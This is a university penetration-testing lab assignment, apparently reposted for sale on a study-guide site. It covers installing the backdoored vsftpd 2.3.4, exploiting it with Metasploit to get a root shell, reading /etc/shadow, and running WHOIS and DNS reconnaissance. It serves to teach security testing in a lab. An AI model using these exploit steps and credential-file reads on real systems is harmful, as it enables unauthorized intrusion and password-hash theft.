Study Guides: Ethical Learning. Better Understanding

CTCH 690 9040: Unit 4 Assignment: Project 2 Part B: Performing a Penetration Test

CTCH 690 9040: Unit 4 Assignment: Project 2 Part B: Performing a Penetration Test

Unit 4 Assignment: Project 2 Part B: Performing a Penetration Test

Instructions

Perform the following exercises in MARS, the virtual learning environment. Follow the steps in each exercise, taking screenshots as you go along and inputting the information and documentation in a Word document using the template provided in the submission instructions.

Lab Setup: Setting up Vulnerable FTP Service

To facilitate penetration testing and enhance our understanding of security vulnerabilities, you will intentionally install a vulnerable version of FTP on our Ubuntu machine. Please note that this step is optional. If you want, you can skip ahead to the penetration test.

Instructions

  1. Proceed with the installation of a vulnerable FTP service by cloning the following GitHub repository:
    git clone https://github.com/vulnerable/ftp.git
A terminal window shows a git clone command being executed. Below the command, the terminal displays progress messages indicating that objects were enumerated, received, and resolved successfully.

 

  1. Next, set up the necessary packages to establish a built environment. Specifically, install ‘build-essential’, which encompasses all essential components for compiling basic software written in C and C++. Execute the following command to install “build-essential”:
  • cd vsftpd-2.3.4-infected.git
  • sudo apt-get install build-essential
A command to install build‑essential using sudo apt to install build-essential is executed, triggering a list of required and suggested packages to be displayed. The output shows the system calculating installation size, requesting confirmation to continue, and beginning to download the necessary packages.
root@UBUNTU:~/Downloads/vsftpd-2.3.4-infected# chmod +x vsf_findlibs.sh

 

  1. Before initiating the build process, make a slight modification to the “Makefile” by adding “-lcrypt” to the “LINK” flag. Access the “Makefile” for editing using the “nano” text editor:

nano Makefile

A Makefile opened in GNU nano highlights the LINK = -Wl,-s,-lcrypt line with a red arrow pointing to the -lcrypt flag. Several compiler variables and a long list of object files appear below as part of the build configuration.

 

  1. After making the necessary changes to the “Makefile”, simply execute the following command: root@UBUNTU:~/Downloads/vsftpd-2.3.4# make
A make command is executed, and the build process begins compiling multiple source files with repeated gcc -c entries. The output lists each C file being compiled using the specified flags and include paths.

 

  1. Upon successful execution of the command, you’ll observe a binary file named “vsftpd” generated in the current directory.
A directory listing shows many source and object files, with arrows highlighting the newly created vsf_findlibs.sh script and the vsftpd binary. The files appear in mixed colors, indicating different file types generated after compiling the project.

 

  1. Before executing the generated binary, you need to set up some prerequisites. Create a user named “nobody” and a directory named “empty”. On Ubuntu, the user “nobody” is typically available by default, but if not, you’ll create it.

sudo useradd nobody
sudo mkdir /usr/share/empty

  1. To proceed, you need to copy the executable file and the configuration files to their respective directories for the application to run properly.

sudo cp vsftpd /usr/local/sbin/vsftpd
sudo cp vsftpd.8 /usr/local/man/man8
sudo cp vsftpd.conf.5 /usr/local/man/man5
sudo cp vsftpd.conf /etc

  1. To set up anonymous access to the FTP server, you’ll create a directory and add it to the user configuration.

sudo mkdir /var/ftp/
useradd -d /var/ftp ftp

A series of setup commands is shown, beginning with sudo useradd nobody followed by multiple sudo commands that create directories, copy the vsftpd binary and configuration files, set ownership, adjust permissions, and start the service. These commands are highlighted in red boxes to emphasize each step in the installation and configuration process.

 

  1. To add a rule to allow traffic on port 21 (FTP) to the INPUT chain of the iptables firewall on the Ubuntu server, you can use the following command:

sudo iptables -A INPUT -p tcp –dport 21 -j ACCEPT

A command is entered to allow incoming FTP traffic by adding an iptables rule using sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT. No output appears afterward, indicating the rule was applied without errors.

 

  1. To enable local user login in vsftpd, you need to uncomment the “local_enable” line in the vsftpd configuration file (/etc/vsftpd.conf). Here’s how you can do it:

Open the vsftpd configuration file for editing:

sudo nano /etc/vsftpd.conf

A configuration file open in GNU nano shows the anonymous_enable=YES and local_enable=YES settings, each highlighted with red arrows. Several commented lines above them describe these options and explain default FTP behavior.

 

  1. Now start the vsftpd service by using the following command:

sudo /usr/local/sbin/vsftpd

A command is entered to start the FTP service using sudo /usr/local/sbin/vsftpd, highlighted with a red box. No output appears beneath the command, indicating it ran without errors or visible messages.

Exercise 1: Penetration Testing

Objective: Perform a rigorous penetration test on a structured virtual network environment, designed with intentional vulnerabilities.

Instructions

For this lab, you’ve been tasked by the University of Maryland to conduct a penetration test on their internal network and web application. This is a grey box approach, meaning you have limited knowledge of the network and application architecture.

Machine Details:

  1. Ubuntu Machine:
    • IP Address: 10.11.14.86
  2. Windows 10 Machine:
    • IP Address: 10.11.14.85

Web Application Details:

Your objective is to assess the security posture of the network and the OWASP Juice Shop web application, identify vulnerabilities, and provide recommendations for remediation.

  1. To perform network enumeration using Nmap, follow these steps:
    1. Open a terminal on your Kali Linux machine.
    2. Use the following command to scan the network and gather information about hosts and open ports:

└─# nmap -sC -sV  10.11.14.86 10.11.14.85 -oN pentest.txt

An Nmap command (nmap -sC -sV 10.11.14.86 10.11.14.85 -oN pentest.txt) is highlighted at the top of the screen. Below it, the scan results show an open FTP port running vsftpd 2.3.4 with anonymous login allowed and detailed FTP server status information.
The scan output lists open ports and service versions for two hosts, showing SSH and XRDP services on one system and SSH, RPC, NetBIOS, HTTPS, and VRDP services on the other. Each host entry includes detailed SSH host keys and protocol information.
A network scan output displays detailed information for a Windows host, including RDP service details, certificate dates, MAC address, and HTTPAPI service data. Additional host script results show SMB settings such as message‑signing status and NetBIOS information.

 

  1. The nmap scan has been completed, revealing two hosts with several ports and services open. Now, it’s time to delve deeper into enumeration. First, let’s focus on port 21. According to the nmap output, the FTP port is open on the .86 machine, and fortunately, anonymous FTP is enabled! We’ll connect to the FTP port from our attacker machine (Kali) and explore to see if we can uncover any valuable information.An FTP connection is initiated to 10.11.14.86, and the login attempt using anonymous credentials succeeds, as indicated by the “230 Login successful” message. The session then identifies the remote system type as UNIX and enters the FTP prompt.

 

  1. You should have successfully logged in. It appears that the organization is not adhering to best practices. While you didn’t discover anything substantial within the FTP server, you can still classify this as a medium-level risk.
An FTP client issues the dir command, and the server responds that the PORT command succeeded with a suggestion to use passive mode. The server then reports that the directory listing is being sent and completes the transfer successfully.

 

    1. Upon examining the nmap output, you’ve identified the FTP version as 2.3.4. Conduct a Google search to investigate if there are any exploits for this particular version of FTP.
    2. Remarkably, you’ve discovered that this version of vsftpd is susceptible to Command Execution. By following the links provided in the search results, you can learn how to exploit this vulnerability.

<liremarkably,></liremarkably,>

A Google search for “vsftpd 2.3.4 exploit” displays results highlighting backdoor command‑execution vulnerabilities associated with this version of VSFTPD. The top links, outlined in red, include entries from Rapid7 and Exploit‑DB referencing the same backdoor exploit.

 

  1. Additionally, you can utilize Metasploit to search for exploits targeting this specific version. Start Metasploit from your Kali machine.
A command to launch Metasploit (msfconsole) is highlighted at the top of the screen, and the console displays its ASCII‑art banner. Below the banner, Metasploit lists the number of available exploits, payloads, and modules before presenting the msf6 > prompt.
A Metasploit search for “vsftpd 2.3.4” returns one matching module. The highlighted entry shows the VSFTPD v2.3.4 backdoor command‑execution exploit with an excellent ranking.

 

  1. You can also utilize the “searchsploit” tool, which is already available on our Kali machine, to search for specific exploits targeting applications.
A searchsploit query for “vsftpd 2.3.4” returns a highlighted entry for the VSFTPD 2.3.4 backdoor command‑execution exploit. The result lists the exploit’s file path as unix/remote/17491.rb.

 

  1. Now that you’ve learned multiple methods to discover exploits, proceed with exploiting this vulnerability using Metasploit, which offers an easy and convenient approach.
  • search vsftpd 2.3.4
A Metasploit search for “vsftpd 2.3.4” displays one matching exploit module in the results. The highlighted entry identifies the VSFTPD v2.3.4 backdoor command‑execution exploit with an excellent ranking.
  • use 0
A Metasploit session shows the use 0 command being run to load the VSFTPD 2.3.4 backdoor exploit, followed by the show options command. The module options displayed include RHOSTS and RPORT settings, with the payload defaulting to cmd/unix/interact.

 

  1. You only need to configure one option, which is to set the RHOSTS (remote host). In our case, it’s the IP address of the Ubuntu machine. Once you’ve configured this, you can simply type either “run” or “exploit” to initiate the exploitation of the target.
  • set RHOSTS 10.11.14.86
A Metasploit command is entered to set the RHOSTS value to 10.11.14.86, and the console confirms the update. The prompt then returns to the VSFTPD backdoor exploit module, waiting for the next command.

 

  1. You’ve successfully gained access to the Ubuntu machine!
  • exploit
A Metasploit session runs the VSFTPD backdoor exploit, showing that a backdoor service was spawned and a shell was successfully obtained. The output confirms “Command shell session 1 opened” with the target host’s IP address and port details.

 

  1. Now that you have full access to this machine, you can execute any commands you desire. Run a few commands to explore further. For example:

whoami; hostname

pwd

cat/etc/shadow

ip addr 

A command shell obtained through the VSFTPD exploit shows whoami returning “root” and hostname returning “UBUNTU.” The session displays the current directory and the contents of /etc/shadow, indicating full root‑level access.
A command output from ip addr displays several network interfaces, with the eth0 interface showing the IPv4 address 10.11.14.86/28 highlighted. Additional details such as MAC addresses and IPv6 entries appear beneath each interface listing.
  1. Above you can see you can run commands such as whoami, hostname, ip addr, and cat /etc/shadow. The output of the commands shows you are root, and you can even see the hash of the users. At this point, you fully compromised the Ubuntu machine.
  2. Stop your pentest here, and document all your findings and report to your client. Take your time and perform the same steps on the Windows 10 machine and see if there are any known vulnerabilities that can be exploited to gain access to the Windows 10 machine as well.

Excercise 2: Footprinting

Objective: Analyze a network of virtual machines to identify security weaknesses and potential breach points.

Instructions

Now, you’ll perform a pentest on their web application.

In the initial phase of web pentesting, start by thoroughly examining the website, understanding its purpose, browsing related forums for discussions, and extensively researching it using Google. The goal is to gather as much information as possible to inform our testing strategy and uncover potential vulnerabilities.

WHOIS

  1. Go to OWASP Juice Shop.
  2. Input the URL: https://juice-shop.herokuapp.com/#/.
A web browser displays the Juice Shop homepage at the URL highlighted by a red arrow. The page shows several product cards featuring items such as apple juice, banana juice, carrot juice, and artwork for sale.
A browser window shows the DomainTools Whois Lookup page with a search bar containing the URL “https://juice‑shop.herokuapp.com/#/”. The blue “SEARCH” button appears to the right of the entered URL on the lookup interface.

 

  1. By examining the WHOIS output, you can gather valuable information such as DNS details, email addresses, IP addresses, location, name servers, and more. This comprehensive data aids in understanding the domain’s infrastructure and ownership details.
A Whois record page displays registration details for HerokuApp.com, including the registrar (MarkMonitor Inc.), name servers, IP address, hosting location in Virginia, and ASN information. The highlighted section lists domain status values, creation and expiration dates, and other administrative data.

 

DNS enumeration:

  1. For DNS enumeration, proceed under the assumption that Facebook is a partner, granting you permission to conduct a penetration test on their systems as well. This allows you to expand your scope and explore potential vulnerabilities within the Facebook domain. Limit your attacks to the lab’s scope, and adhere to the bug bounty program’s guidelines. Utilize DNS Dumpster for DNS enumeration to collect information within the authorized scope.
A DNS lookup page displays the message “Showing results for facebook.com” highlighted near the top. Below it, the interface shows a world map with host locations marked in green and a hosting‑information chart on the left.
A DNS results page lists Facebook’s authoritative DNS servers along with their IP addresses and corresponding countries. Below the DNS section, the page displays MX and TXT records, including mail‑server information and several domain‑verification entries.

 

  1. You have been presented with a substantial amount of information. Please take your time to review it thoroughly. Additionally, you can utilize another tool called OSINT Framework, which is invaluable for information gathering. Feel free to explore the OSINT Framework.
An OSINT Framework diagram displays a central node branching into multiple categories such as usernames, email addresses, domain names, social networks, public records, geolocation tools, and threat intelligence. Each category expands outward as part of a structured visual map used for organizing open‑source intelligence resources.
  1. Since the scope of your web application penetration test was limited to information gathering, you will conclude the assessment at this stage and prepare to present your findings to the client.

Exercise 3: Documentation Requirements

Objective: Document the findings and vulnerabilities uncovered during the penetration testing process.

Instructions

  • Document all commands executed, logs generated, and relevant system activities.
  • Capture screenshots of critical steps, observed alerts, events, and configuration changes made during the testing process.
  • Ensure thorough documentation of created files, usernames, backdoors, and any other modifications made to the system.
  • After documentation is complete, securely delete any created files, and remove any backdoors to maintain system integrity.

Revised Key Findings:

  • Provide a summary of the key findings from each exercise, detailing the outcomes of the penetration testing activities.
  • Describe the effectiveness of the grey box approach and the limited knowledge of the network and application architecture in identifying vulnerabilities.
  • Reflect on the experience of efficiently triaging and cataloging cyber-attacks using specialized tools, highlighting successful mitigation strategies and areas for improvement.
  • State how penetration testing is related to business continuity planning. Justify your response with examples and citations.

Exercise 4: Effective Strategies and Countermeasures

Objective: Compose effective strategies and countermeasures to reinforce the security of the network based on the penetration test results.

Instructions

Based on your Unit 4 Discussion and your work performed in the Unit 4 Assignment, state the strategies and countermeasures to reinforce the security of the network based on the penetration test results.

Tutorial for Performing a Penetration Test

Unit 4 Assignment Directions: Project 2 Part B: Performing a Penetration Test

$45.00

Posted

in

by

Tags:

Biology CMIT 495 Course Syllabus ITT-116 Syllabus